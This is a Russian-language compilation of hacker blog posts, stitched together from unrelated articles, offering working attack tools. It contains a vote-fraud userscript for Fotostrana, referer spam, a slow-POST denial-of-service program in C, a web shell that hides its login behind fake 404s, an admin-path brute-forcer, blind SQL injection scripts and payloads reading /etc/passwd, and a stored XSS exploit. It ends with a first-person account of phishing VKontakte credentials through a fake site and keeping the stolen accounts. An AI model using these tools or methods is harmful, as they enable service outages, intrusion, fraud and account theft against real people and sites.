Нам понадобятся следующие конкурсы (я буду называть их так): Встречи (скрипт meeting), Лицо с обложки (fsrating) и Голосование Мисс/Мистер (contest).

Userscript

Суть накрутки популярности заключается в автоматизации процесса голосования в приведенных выше конкурсах. Для автоматизации я предлагаю использовать Userscript. Что такое Userscript и как его устанавливать я уже описывал ранее.

Собственно сам скрипт:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53

// ==UserScript==
// @name        fs_like_click
// @author Lukmus (blog.lukmus.ru)
// @namespace   fotostrana.ru
// @include     about:addons
// @version     1.0
// @require  http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js
// ==/UserScript==
 
(function (window, undefined) {
    var w;
 
    if (typeof unsafeWindow != undefined) {
        w = unsafeWindow
    } else {w = window;}
 
    if (w.self != w.top)return;
 
    alert('fs photo click & contest click 10k with if loaded');
    if (/http:\/\/fotostrana.ru\/\?fsrating=(.)+/.test(w.location.href)) {
    	for(i=0;i<10000;i++){
		setTimeout(function(){
		  if(Math.random()*10>2)
		    $('.ibtn.ibtn-big.ibtn-blue.fsr-photo-like').click();
		  else
		    $('#fsr-photo-next-arrow').click();
		},i*2000);
	}
    }
 
    if (/http:\/\/fotostrana.ru\/contest\/(.)+/.test(w.location.href)) {
 
    	for(i=0;i<10000;i++){
	        if(i==0)delay=10000; else delay=0;
 
		setTimeout(function(){
		  strs=/.+addPaid.+/.test($('.contest-btn.contest-btn-big.contest-popup-main-btn-vote').attr('onclick'));
		  if(!strs)
		    $('.contest-btn.contest-btn-big.contest-popup-main-btn-vote').click();
		  else
		    contestApp.popupMain.next();
 
		},delay+i*2000);
	}
    }
 
    if (/http:\/\/fotostrana.ru\/meeting(\/)?/.test(window.location.href)){
      for(i=0; i<10000; i++){
	setTimeout(function(){$('.meeting-btn-bc.meeting-btn-bc-mb.btn.btn-big.btn-big-mb').click();},i*2000);
      }
    }
 
})(window);

В работе скрипта сможет разобраться любой, кто хоть чуть-чуть знает JavasScript и JQuery. Для не обладающих тайным знанием JS следует знать, что alert('fs photo click & contest click 10k with if loaded'); можно безболезненно удалить или закомментировать, если это предупреждение выводит из себя.

Эксплуатация

После того как Userscript успешно установлен, открываем в браузере Фотострану, логинимся и открываем 3 вкладки: Встречи, Лицо с обложки и Голосование Мисс/Мистер.

Голосование Мисс/Мистер

Помимо захода на саму страницу голосования надо собственно выбрать какого-нибудь персонажа и нажать на него, далее процесс голосования должен запуститься автоматически, однако если этого не произойдет следует обновить страницу (URL с уже выбранным персонажем).

Лицо с обложки

Тут для запуска надо тоже первоначально выбрать кого-нибудь, в случае если скрипт не стартанул нужно также обновить страницу.

Встречи

Здесь никого выбирать не надо, скрипт должен сразу начать голосовать, но если этого не произошло опять же обновляем страницу. Выбирать во Встречах можно не более 100 раз в час, скрипт автоматически выбирает не “Да”, а “Возможно”, но Фотострана учитывает и этот ответ тоже как положительный.

Собственно теперь остается только открыть три вкладки и свернуть браузер, через 3-5 часов ваша популярность взлетит до небес. Причиной такого неожиданного роста внимания к вашей персоне – любопытство и благодарность, если вы за кого-то голосуете или вам “нравится” чья-то фотография, то в Фотостране вас за это обязательно отблагодарят ни о чем не подозревающие дамочки по ту сторону монитора.

почему нужен браузер

Сделать простой скриптик, который бы заходил на все подряд сайты имея при этом в заголовке нужный нам реферер не вариант т.к. он прокатит только в том случае если статистику ведет какой-нибудь серверный скрипт/плагин к CMS итд, в случае если веб-мастер смотрит статистику через всякие JS-ые штуки типа Яндекс.Метрика или Google Analytics, а такой расклад преобладает, наш реферер никуда не запишется т.к. простенький скриптик, мягко говоря, не умеет интерпретировать JavaScript.

Собственно поэтому нам нужен полноценный браузер.

firefox & RefControl

Т.к. я в основном пользуюсь FF, я рассматривал только его.
Изменить заголовок пакета, в том числе и referer, в FF можно миллиардом разных плагинов, но чтобы изменить его 1 раз для всех сайтов и всех запросов больше не заходя в настройки нужен только 1 плагин  – RefControl.
Короче, устанавливаем этот RefControl в FF и настраиваем, благо там все элементарно. Лично я настроил так:

И вам тоже советую настроить также, поставить Referer как http://ii.lukmus.ru/.

На этом я и остановился, я также как и всегда лазию по инету, но еще и оставляю ссылку на себя.

автоматический вариант. суперкостыли

Лично я считаю, что сайты, веб-мастера которых смотрят рефереры на свои сайты, лежат здесь, причем на странице где-то больше 300-ой.
Поэтому предлагаю вот такой скриптик на Ruby, который парсит яндекс.блоги и загружает их поочереди в FF.

1
2
3
4
5
6
7
8
9
10
11
12
13

require 'net/http' 
 
http=Net::HTTP.new('blogs.yandex.ru')
(300..1000).each do |page|
  path="/top/standalone/?page=#{page}"
  resp,data=http.get(path)
  data.scan(/><\/a><a href="(http:\/\/.+?)" title=/i).
    collect{|l| l[0]}.each do |link|
    system("firefox #{link}")
    sleep 10 #время на прогрузку страницы
    system("killall firefox")
  end#each
end#each

Разумеется окно FF будет раздражительно появляться и исчезать на экране, и чтобы сэкономить нервные клетки предлагаю запускать подобные вещи в виртуальной машине.

В кратце опишу, что SynQ придумал и реализовал.

Всем известно что начиная с 3.0 Firefox стал экранировать разного рода ковычки (‘,”,`), а SynQ реализовал патч к FF. Причем он сделал патчи и под Windows и под Linux. Вообщем, большое ему спасибо и вселенское уважение.

Сама тема и патч – https://rdot.org/forum/showthread.php?t=1403

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

# uname -a
Linux 2.6.34.7-56.fc13.x86_64
# find / -name libxul.so
/usr/lib64/thunderbird-3.1/libxul.so
/usr/lib64/xulrunner-1.9.2/libxul.so
 
# chmod a+x make_ff_sexy
# ./make_ff_sexy
Make FF Sexy!
 
USAGE: ./make_ff_sexy [version] /path/to/libxul.so
Versions:
1 - patch for single quote (')
2 - patch for double-quote (")
3 - patch for backquote (`)
4 - 1+2 versions
5 - 1+3 versions
6 - 2+3 versions
7 - 1+2+3 versions
Example: ./make_ff_sexy 7 /usr/lib/xulrunner-2.0/libxul.so
 
Patch v1.0 for rdot.org
# ./make_ff_sexy 7 /usr/lib64/xulrunner-1.9.2/libxul.so
Patched Succesfully!

Уязвимость опирается на так называемый «медленный» POST-трафик, который затруднительно дифференцировать от законного обмена данными. DDOS-атаки легко проводить в окружении многопользовательских онлайновых игр как среды распределенных компьютерных сетей, затрагивающих массу вычислительных систем.

Что интересно, «медленная» POST-технология может быть вполне адаптирована для работы с SMTP и даже DNS-серверами. Атака работает так: вредоносный код отправляет POST-заголовки с легитимно заполненными полями, касающимися размеров готовящихся к передаче данных, однако последние затем передаются на очень низких скоростях, что приводит к формированию «заторов» на серверах и связыванию их системных ресурсов. Достаточно нескольких десятков тысяч ботов, чтобы отключить сервер. Балансирующее нагрузку ПО, ныне используемое для предотвращения DDOS-атак, не эффективно против новой методики.

В общем суть сводится к тому что мы посылаем совершенно обыкновенный POST, где data идет очень долго, иначе говоря data’у посылаем посимвольно с задержками.

Проверял на нескольких сайтах, где-то обрывают соединение не понятно почему, где-то нет. Вероятно, не работает там, где используется nginx как front-end. Что удивительно, как будто этот код написан под mail.ru, там идет как литое.

Реализация на C под Linux:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75

#include <stdio.h>
#include <sys/socket.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
 
#define BUF_LEN 4096
#define HTTP_PORT 80
#define SLEEP_PERIOD 1
#define POST_COUNT "100"
#define PATH "/path/to/post"
 
int main (int argc, char ** argv)
{
int sock, count;
char * buf;
struct hostent * host;
struct sockaddr_in addr;
 
if (argc < 2) {
fprintf (stderr, "Too few arguments\n");
return 1;}
 
buf = (char *) malloc (BUF_LEN);
 
if (buf == NULL) {
fprintf (stderr, "malloc() error\n");
return 1;}
 
sock = socket (PF_INET, SOCK_STREAM, 0);
 
if (sock == -1) {
fprintf (stderr, "socket() error\n");
return 1;}
 
addr.sin_family = AF_INET;
 
host = gethostbyname (argv[1]);
 
if (host == NULL) {
fprintf (stderr, "Unknown server\n");
return 1;}
 
addr.sin_addr = * (struct in_addr*)host->h_addr_list[0];
 
addr.sin_port = htons (HTTP_PORT);
 
if (connect(sock,(struct sockaddr*) &addr, sizeof (addr))==-1)
 {fprintf (stderr, "connect() error\n");
return 1;}
 
strcpy (buf, "POST ");
strcat (buf,PATH);
strcat (buf," HTTP/1.1\r\n");
strcat (buf,"Content-Type: application/x-www-form-urlencoded\r\n");
strcat (buf,"Content-Length: ");
strcat (buf,POST_COUNT);
strcat (buf,"\r\n\r\n");
 
fprintf(stderr,buf);
write (sock, buf, strlen (buf));
 
for(int i=0;i<atoi(POST_COUNT)-1;i++){
fprintf(stderr,"-%d", i);
write(sock,"a",1);
sleep(SLEEP_PERIOD);}
strcpy(buf,"\r\n");
write (sock, buf, strlen (buf));
 
while ((count = read (sock, buf, BUF_LEN)) > 0)
write (1, buf, count);
 
close (sock);
free (buf);
return 0;

Компилируем так:

1

$ gcc -o newdos newdos.c -std=gnu9

Полную новость смотрите на rdot’е.

Вообщем мне понадобилось и я дописал пару строчек, выполняющих авторизацию.

Я предлагаю 2 вида авторизации:

• ввод пароля в адресной строке методом GET
• хэш пароля в User-Agent браузера

Второй способ мне больше нравится т.к. не надо ничего запоминать, однако в таком случае если вы зайдете с этого браузера на любой другой сайт, то ваш хэш с легкостью будет перехвачен и записан в лог апача. Поэтому лучше использовать 2 способа одновременно.

Конфиг авторизации лежит в самом начале скрипта шелла:
//---------------------config-
$get_pass=md5("getpass"); //пароль по GET
$ua_pass=md5("uapass"); //пароль по User-Agent
$auth_var=array(
'get_pass'=>true, //вкл/выкл GET
'user_agent'=>false); //вкл/выкл User-Agent
//----------------------------

В случае неудачной авторизации шелл выдаст ошибку 404 и немного изменит в адресной строке адрес т.е. заредиректит на схожий путь, тем самым запутав любопытного админа.

Ввод пароля по GET делается так:
/path/to/shell.php?kw=getpass

Для того, чтобы войти по User-Agent нужно вбить в браузер, чтобы он давал такой заголовок в пакете. Например в Firefox’е это делается так:

• в адресной строке вводим about:config
• в поле фильтр вбиваем general.useragent.extra.firefox
• дописываем в значение поля хэш нашего $ua_pass

Скачать это дело можно тут.

Однако, часто так бывает, что на одном хостинге (аккаунт хостинга) размещается куча сайтов, но т.к. аккаунт от хостинга 1, то и сервер БД один, а иногда и БД одна для разных сайтов.

Короче, представим такую ситауцию, вы нашли уязвимое место, скажем SQL-inj, вытащили все пароли, но на этом сайте нет админок или эти пароли не подходят. В таком случае нужно найти все сайты, которые висят на этом сервере или же все сайты, которые принадлежат этому акку хостинга. Узнать последнее – задача не тривиальная, а первое можно через тот же 2ip.ru.

Далее весь этот список сайтов нужно просканировать на различные пути к админке. Havij позволят за 1 раз искать пути только к 1 сайту. А если у нас список из 50-100 сайтов, то каждый раз вбивать в ручную в Havij утомительно.

Я предлагаю такой простенький скриптик, который переберет все пути к списку сайтов. Скачать можно здесь.

конфигурация

Открываем файл config.rb и видим:

1
2
3
4

$site_list="site_list" # список сайтов
$admin_list="admin_list" # список путей к админкам
$th_count=50 # количество потоков
$log_file="log" # лог файл, записываются успешные пути

и все сразу становится понятно.

В архиве прилагается список путей к админкам честно украденный из Havij.

Принцип работы скрипта прост – запрашивает страницу с данным путем и если код ответа сервера не равен 404, то путь записывается в $log_file как успешный.

Еще хочу попросить, если у кого-то есть более полный список путей к админкам, то выложите где-нибудь, пожалуйста.

Однако, была одна надежда – нужно было прочитать один скрипт, который располагался в поддомене основного, но путь к нему я не знал. Честно говоря, я на солярном сервере вообще плохо ориентировался.

Решение мне подсказал rat-energizer с rdot‘а.

решение

Читаем /etc/vfstab и видим там что-то типа

#device device mount FS fsck mount mount
#to mount to fsck point type pass at boot options
#
fd - /dev/fd fd - no -
/proc - /proc proc - no -
/dev/md/dsk/d2 - - swap - no -
/dev/md/dsk/drk /dev/md/rdsk/d1 / ufs 1 no logging
/dev/md/dsk/dw /dev/md/rdsk/d3 /www ufs 2 yes logging
/dev/md/dsk/dat /dev/md/rdsk/d4 /data ufs 2 yes logging
/dev/md/dsk/da /dev/md/rdsk/d5 /app ufs 2 yes logging
swap - /tmp tmpfs - yes--

Внимательно смотрим и если видим там UFS, то дело в шляпе.

Документации по этой теме я не нашел. Короче суть дела в том, что файловая система UFS, по крайней мере, в Solaris предоставляет возможность читать директории как файлы. Программно открыв директорию можно получить список содержащихся там файлов.

Эта директория-файл читается как бинарный файл, поэтому скрипт не должен останавливатся когда при чтении дойдет до символа с ASCII больше 127 или равному 0.

Для примера, если прочитать /etc, то в выходном файле будет что-то типа


...TIMEZONEautopushcfgadmclricroncron.ddcopydefaultdfsdhcpfffmthardformatfsfsck
и так далее...

Если вы будете использовать эту возможность, для считывания файла через MySQL через мой скрипт в прошлой статье, то там следует поменять условия проверки окончания файла, если ASCII-код символа равен 0 или больше 127.

Первый скрипт долгий т.к. однопоточный, зато точный т.е. стопудов однозначно вычислит символ до которого дошел. Второй многопоточный, иногда немного недовычисляет при частых обрывах сети, однако допустим для вычисления текста файла функцией MySQL LOAD_FILE в самый раз т.к. гораздо быстрее обработает длинный текст, а не досчитанные символы можно самому догадатся или же пробежатся по ним первым скриптом.

Аналогов, наверное, существует немерянно, но несмотря на это, я думаю, что мои скрипты обладают отличным преймуществом – они очень гибкие т.к. примитивны и в них очень легко разобратся.

Что такое SQL-inj, в том числе и слепая скуля, как с ними быть и многое другое, на мой взгляд лучше всего описано в этом FAQ на rdot’е.

скачать скрипт

Как вы понимаете, если у вас слепая инъекция, то никаких прямых выводов на страницу не может быть. Вы задаете какой-либо предикат, а проще говоря, условие, например

128>ASCII(MID(LOAD_FILE('/etc/passwd'),1,1))

и в соответсвии с этим условием у вас отобразится, например, либо новость под номером 10, либо 9. Приведу пример полного запроса:

http://site.com/?id=IF(128>ASCII(MID(LOAD_FILE('/etc/passwd'),1,1)),10,9) --

ну или так:

http://site.com/?id=10 AND 128>ASCII(MID(LOAD_FILE('/etc/passwd'),1,1)) --


В первом примере, если 128 больше ASCII-кода первого символа файла /etc/passwd, то выведется страница с новостью 10, в противном случае, выведется 9. Второй случай практически идентичен первому, заисключением того, что если не больше ASCII-кода, то выведется неизвестно какая страница (для каждого сайта индивидуально, надо просто попробывать запрос http://site.com/?id= ), скорее всего это будет редирект на главную.

Вообще существует достаточно много всяких способов раксрутки слепых скулей, не только по странице, которую мы получаем на выводе. Короче читаем FAQ, ссылка на которую указана выше.

Так вот скрипт, берет допустим первый символ и формирует такой запрос:

128>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1))

если условие верно т.е. открылась страница с новостью 10, значит 128>=ASCII>=0, тогда скрипт делает запрос

64>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – верно

32>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – неверно

тогда следующий запрос, будет отталкиватся от кода 48 (48=32+32/2)

48>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – верно

тогда вычитаем 8 (на прошлом ходе прибавляли 16, на каждом шаге делем на 2)

40>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – неверно

44>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – верно

42>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – верно

41>=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – неверно

42=ASCII(MID(LOAD_FILE('/etc/passwd'),0,1)) – верно

таким образом мы за 9 шагов однозначно определили символ.

Далее скрипт берет следующий символ и начинает все заново.

128>=ASCII(MID(LOAD_FILE('/etc/passwd'),1,1))

Я не читал, все статьи по blind SQL-inj, поэтому если кто-то придумал такой перебор раньше меня, а так наверняка оно и есть, не обижайтесь, что здесь нет ссылки на вышу статью и укажите ее в комментариях.

Все разгаданные символы скрипт записывает в файл и выводит на экран консоли.

Она располагается в начале скрипте и представляет из себя инициализацию глобальных переменных.

#config
$request="/article.php?id=44+AND+##NUM####SIGN##ASCII%28MID%28##REPLACE##,##I##,1%29%29"
$outfile="outfile"
$priznak="eta_kartinka_est_tolko_v_statie_s_nomerom_44.jpg"
$func="LOAD_FILE%28"+"0x2f6574632f706173737764"+"%29" #/etc/passwd
$site="www.site.com"
$start=1
#config

$request – сам запрос, с метками:

• ##NUM## – число с которым сравнивается ASCII-код
• ##SIGN## – место, куда будет подставляться знак (>,=)
• ##REPLACE## – сама функция, задающаяся в переменной $func
• ##I## – номер символа

Задаем эту переменную в соответствии с нашим запросом, при этом правильно расставляем метки.

$outfile - файл куда будет все выводится.
$priznak – часть страницы, отличающая страницу с верным выводом от неверной. Т.е. при таком виде запроса

http://site.com/?id=10 AND 128>ASCII(MID(LOAD_FILE('/etc/passwd'),1,1)) --

или

http://site.com/?id=IF(128>ASCII(MID(LOAD_FILE('/etc/passwd'),1,1)),10,9) --

эта часть текста HTML должна присутствовать только в новости с индексом 10.

$func – функция, которую мы вызываем. Это может быть LOAD_FILE(), VERSION(), USER() итд, комбинации из них, короче все на что хватит фантазии.

$site – сайт, где располагается SQL-inj.

$start – номер символа, с которого начинать.

скачать скрипт

Принцип работы нечем не отличается, заисключением того, что скрипт вычисляет не последовательно символ за символом, а сразу паралельно несколько символов, количество которых равно количеству потоков заданных в конфигурации.

Конфигурация, такая же, добавился лишь один параметр $th_count. Он определяет количество потоков.

Чем же плох многопоточный вариант? При стабильном соединении с интернетом не чем т.е. он вычислит все символы как надо и быстро. Если же соединение часто обрывается, как например на 3G-модемах, то некоторые потоки будут умерать оставляя свой символ недовычисленным. Для примера, при нестабильном соединении (скорость скачет от 1КБ/с до 300КБ/с, соединение обрывается каждые 3-5 минут) из 10 символов 1 будет недовычислен.

Актиная XSS наблюдается в таких разделах плагина как ‘Рефереры’, ‘Агенты’ итд, короче везде, где наблюдаются данные заголовка HTTP-пакета, разумеется кроме кукисов.

Тестировалось на mystat 2.6 (на данный момент последняя версия) и WordPress 2.9.2. Существует отличная от нуля вероятность, что эта бага актуальна для всех версий WordPress и всех существующих на данный момент версий mystat.

Эксплойт

Эксплойт написан на Ruby, как установить и запустить Ruby читайте в предыдущих статьях этого блога.

#!/usr/bin/ruby
require 'net/http'
http = Net::HTTP.new('very.popular.blog.ru', 80)
path = '/'
headers = {
'Referer' ='<script>alert(/XSS/);</script>',
'User-agent' ='<script>alert(/XSS/);</script>'}
resp, data = http.get(path, headers)
if resp.code.to_i==200 then puts "Exploiting OK"
else puts "Exploiting failed" end

Фикс
Открываем /wp-content/plugins/wp-mystat/mystat.php и фильтруем в функции function myStat_header() html-теги функцией htmlspecialchars():

$US['lang']=htmlspecialchars((string)substr($GLOBALS['_SERVER']['HTTP_ACCEPT_LANGUAGE'],0,2));
$US['user_agent']=htmlspecialchars((string)$GLOBALS['_SERVER']['HTTP_USER_AGENT']);
$US['referer']=(string)isset($GLOBALS['_SERVER']['HTTP_REFERER'])?htmlspecialchars($GLOBALS['_SERVER']['HTTP_REFERER']):'';

Здесь приведен не полный список полей, которые надо фильтровать.

Статья не призывает ни к каким действиям, противоречащим законодательству.
Ответственность за использование материала ложиться только на вас!

Я по началу просто обрадовался этому, несомненно положительному событию. И только через несколько десятков минут понял, что на этом можно отлично поднять траф. Многие этим уже активно занимались, например те, кто первый бросил утку о том, что все без исключения сервера Вконтакте.ру конфискованны МВД за распостранение порнушки, нелицензионного софта и сливу в паблик какой-то госудраственной секретной лабуды. Многие на это активно велись.

Утку бросить я бы не смог т.к. не имею какого-нибудь достаточно популярного сайта или на худой конец твиттера. Поэтому я решил действовать по другому и вместо поднятия себя ТИЦ’а, путем вставки всевозможных ссылок на мою утку в форумах, конференциях итд, принялся сливать трафик на фейк контакта, вот таким способом (см. рисунок).

Иначе, говоря я писал где только можно, мол ” Вконтакте восстановил свою резервную копию и зайти на сайт можно по следующей ссылке”, “Вконтакту прикрыли домен и он переехал на этот адрес” и прочую ересь.

Модераторы регулярно терли мои темы, банили акки, но я не отступал т.к. выхлоп с таких сообщений был настолько шикарен, что количество подаренных мне акков за время паники превысило количество всех акков с фейка за последние две недели вместе взятых. Я уже начал подумывать, что мой фейк сам скоро упадет из-за столько активного посещения.

Когда Вконтакте воскрес многие люди, которые поняли что попались на фейк принялись менять пароли. Но далеко не все это поняли,  в общем, на данный момент у меня осталось чуть больше 80% аккаунтов.

В заключении могу сказать, что ни один пароль от аккаунтов я не поменял и никому ничего не продал, хотя мог бы. Не факт, конечно, что я не продам завтра…

Статья является плодом бурной фантазии автора и не призывает ни к каким действиям,
противоречащим законодательству. Ответственность за использование материала ложиться только на вас!
Любые совпадения с реальными людьми считаются случайными.